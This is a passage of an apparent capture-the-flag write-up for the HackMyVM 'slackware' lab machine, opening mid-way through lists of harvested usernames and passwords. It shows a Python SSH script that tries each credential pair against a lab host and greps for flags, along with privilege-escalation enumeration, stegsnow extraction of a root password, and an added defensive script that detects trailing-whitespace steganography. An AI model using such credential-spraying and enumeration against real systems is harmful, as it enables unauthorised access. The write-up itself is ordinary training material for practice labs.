# 'zacarx007', 'terminal', 'zenmpi', 'sml', 'emvee', 'nls', 'noname', 'nolose', 'sancelisso', 'ruycr4ft',
# 'tasiyanci', 'lanz', 'pylon', 'wwfymn', 'whitecr0wz', 'bit', 'infayerts', 'rijaba1', 'cromiphi', 'gatogamer',
# 'ch4rm', 'aceomn', 'kerszi', 'd3b0o', 'avijneyam', 'zayotic', 'kaian', 'c4rta', 'boyras200', 'waidroc', 'ziyos',
# 'b4el7d', 'rpj7', 'h1dr0', 'catch_me75', 'josemlwdf', 'skinny']
#
# ['JRksNe5rWgis', 'lpV8UG0GxKuw', 'B4ReHPEhmlPt',
# 'ex0XVRAAjCWX', 'pof2XIpVzYl3', 'S64IamSERUI3', 'GX2xnNNU2Hcc', 'TB7pVPwPUeIW', 'tX5o7AUg2PTd', 'VZFoxk0lqnnc',
# '8LCa5IDAELR4', 'Qv0dtvZdfpvN', 'WiEbQP6K4Sg9', 'AQewY20VryO7', 'sj5mu74Nmowb', 'VfS9EIU5C9xw', '0Vsok2PoVo7t',
# 'KcHXtRsiUPpw', 'oAGSK1zXcbT8', 'G5UJEpW78pOV', 'JO8dvF60MdXR', 'IBrVGveXM3jI', '6Mqoo8Pud4Fx', 'VBebiyG62uIg',
# '51BwJ9iYO4E7', 'fDZRz4SJOs8z', 'NYURcD5V8k4X', 'eaqz8vJ2pRmU', 'CQBpV2NQ3U6A', 'yjwGMry82S2Y', 'Hz35MslshyXj',
# 'sXdnu8wF1Yb8', 'rjDwcHDFYBML', 'oHjylQ7402Dd', 'vRdS8PLTnTlW', 'bgg9TT9otdD6', 'R23AJFVTQYaB', 'IAuaOSSTZHoh',
# 'oW19TzLywNIq', '0aApTUf5E2Eq', '8eS8I1JGxeeZ', 'llMttpVCiYPw', 'wP26CtkDby6J', 'tnvAny2zwYTV', 'Vkyo6rKvXsIw',
# 'jLzXNEEFdtLX', 'iJ7EnTBCtUS8']

def execute_command(host, port, username, password, command):
    # Create the SSH client
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        # Connect to the SSH server
        client.connect(host, port=port, username=username, password=password)

        # Run the command
        stdin, stdout, stderr = client.exec_command(command)

        # Collect the command's output
        output = stdout.read().decode('utf-8').strip()
        error = stderr.read().decode('utf-8').strip()

        if output:
            print(f"[+] USER:{username} PASS:{password} => {output}")

    except Exception as e:
        print(f"An error occurred: {str(e)}")
    finally:
        # Close the connection
        client.close()

print("[+] Search user flag (っ^_^)っ")
for i in range(0, len(usernames)):
    execute_command('192.168.10.100', 1, usernames[i], passwords[i], "grep -Pnir 'hmv' ./")

# [+] username and password ! (✪ω✪)
# ['claor', 'kretinga', 'mrmidnight', 'alienum', 'powerful', 'annlynn', 'proxy', 'x4v1l0k', 'icex64', 'mindsflee', 'zacarx007', 'terminal', 'zenmpi', 'sml', 'emvee', 'nls', 'noname', 'nolose', 'sancelisso', 'ruycr4ft', 'tasiyanci', 'lanz', 'pylon', 'wwfymn', 'whitecr0wz', 'bit', 'infayerts', 'rijaba1', 'cromiphi', 'gatogamer', 'ch4rm', 'aceomn', 'kerszi', 'd3b0o', 'avijneyam', 'zayotic', 'kaian', 'c4rta', 'boyras200', 'waidroc', 'ziyos', 'b4el7d', 'rpj7', 'h1dr0', 'catch_me75', 'josemlwdf', 'skinny']
# ['JRksNe5rWgis', 'lpV8UG0GxKuw', 'B4ReHPEhmlPt', 'ex0XVRAAjCWX', 'pof2XIpVzYl3', 'S64IamSERUI3', 'GX2xnNNU2Hcc', 'TB7pVPwPUeIW', 'tX5o7AUg2PTd', 'VZFoxk0lqnnc', '8LCa5IDAELR4', 'Qv0dtvZdfpvN', 'WiEbQP6K4Sg9', 'AQewY20VryO7', 'sj5mu74Nmowb', 'VfS9EIU5C9xw', '0Vsok2PoVo7t', 'KcHXtRsiUPpw', 'oAGSK1zXcbT8', 'G5UJEpW78pOV', 'JO8dvF60MdXR', 'IBrVGveXM3jI', '6Mqoo8Pud4Fx', 'VBebiyG62uIg', '51BwJ9iYO4E7', 'fDZRz4SJOs8z', 'NYURcD5V8k4X', 'eaqz8vJ2pRmU', 'CQBpV2NQ3U6A', 'yjwGMry82S2Y', 'Hz35MslshyXj', 'sXdnu8wF1Yb8', 'rjDwcHDFYBML', 'oHjylQ7402Dd', 'vRdS8PLTnTlW', 'bgg9TT9otdD6', 'R23AJFVTQYaB', 'IAuaOSSTZHoh', 'oW19TzLywNIq', '0aApTUf5E2Eq', '8eS8I1JGxeeZ', 'llMttpVCiYPw', 'wP26CtkDby6J', 'tnvAny2zwYTV', 'Vkyo6rKvXsIw', 'jLzXNEEFdtLX', 'iJ7EnTBCtUS8']
# [+] Search user flag (っ^_^)っ
# [+] USER:rpj7 PASS:wP26CtkDby6J => ./user.txt:1:HMV{Th1s1s1Us3rFlag}

We have the flag's location; now log in as rpj7.

Privilege escalation

Through the http service we already obtained user_flag; now on to privilege escalation.

sudo -l

sudo -l asks for the login password. No luck there.

find / -perm -u=s -type f 2>/dev/null

No privilege escalation through this either.

txt steganography

From a hint by a more experienced player, it turns out user.txt contains hidden data (I genuinely did not know this 0.0; lesson learned).

First download user.txt to Kali (the target has no tools).

┌──(root㉿kali)-[/home/kali/baji/slackware]
└─# scp -P 1 rpj7@192.168.56.16:~/user.txt user.txt
(rpj7@192.168.56.16) Password:
user.txt

Use stegsnow to read the data hidden in the file.

We get a string; try logging in as root.
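stegsnow hides data in whitespace at the ends of lines: runs of tabs and spaces that look blank in a terminal, in `cat`, and in a flag file that "only" contains a flag. As an added example that is not part of the original write-up, the Python script below is the check a defender would run over such a file before trusting it: it reports every line carrying trailing spaces or tabs, gives a verdict, and strips the channel so the file can be re-saved clean. It does not decode SNOW's bit encoding (that is stegsnow's job); the sample text and the function names are mine and constructed.

```python
"""Detect and strip whitespace-channel steganography of the kind stegsnow
uses: payload bits encoded as tabs and spaces after the visible end of each
line. Added example; not the write-up's own code and not a SNOW decoder."""
import re
from typing import Dict, List

TRAILING_WS = re.compile(r"[ \t]+$")

# Constructed sample: line 1 is clean, lines 2 and 3 carry invisible trailing
# whitespace (the flag value is made up for the example).
SAMPLE_TEXT = (
    "HMV{constructed_example_flag}\n"
    "nothing to see here \t  \t\n"
    "or here\t\t \n"
    "last line\n"
)


def trailing_whitespace_report(text: str) -> dict:
    """Per-line counts of trailing spaces/tabs plus an overall verdict.
    Any trailing tab, or more than one trailing space, is treated as
    suspicious: editors rarely leave those behind, stegsnow always does."""
    lines: List[Dict[str, int]] = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = TRAILING_WS.search(line)
        if not m:
            continue
        run = m.group()
        lines.append({"line": n, "spaces": run.count(" "), "tabs": run.count("\t")})
    suspicious = any(l["tabs"] > 0 or l["spaces"] > 1 for l in lines)
    hidden_chars = sum(l["spaces"] + l["tabs"] for l in lines)
    return {"lines": lines, "suspicious": suspicious, "hidden_chars": hidden_chars}


def strip_trailing_whitespace(text: str) -> str:
    """Remove the channel entirely; what remains is what a reader saw."""
    cleaned = "\n".join(TRAILING_WS.sub("", line) for line in text.splitlines())
    return cleaned + ("\n" if text.endswith("\n") else "")


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        text = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    else:
        text = SAMPLE_TEXT
    report = trailing_whitespace_report(text)
    for entry in report["lines"]:
        print(f"line {entry['line']}: {entry['spaces']} space(s), {entry['tabs']} tab(s)")
    print("suspicious:", report["suspicious"], "hidden chars:", report["hidden_chars"])
```

`python3 trailing_ws.py user.txt` is enough to tell whether stegsnow is worth running at all; `cat -A` shows the same thing by hand (tabs as `^I`, line ends as `$`), but the script scales to a directory of files.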

Login succeeds; check root.txt.

It says the flag is not here, in the home directory?

root@slackware:/home# grep -ri 'root'
rpj7/.bash_history:su root
0xh3rshel/.screenrc:# Here is a flag for root: HMV{SlackwareStillAlive}

Found it.

grep searches the home directory and its subdirectories for files containing "root"

-r search recursively
-i ignore case

Of course we can also search directly for the flag prefix

grep -ri 'HMV'


HackMyVM-slackware
http://example.com/2024/11/12/HackMyVM-slackware/
Author
butt3rf1y
Published on
12 November 2024
License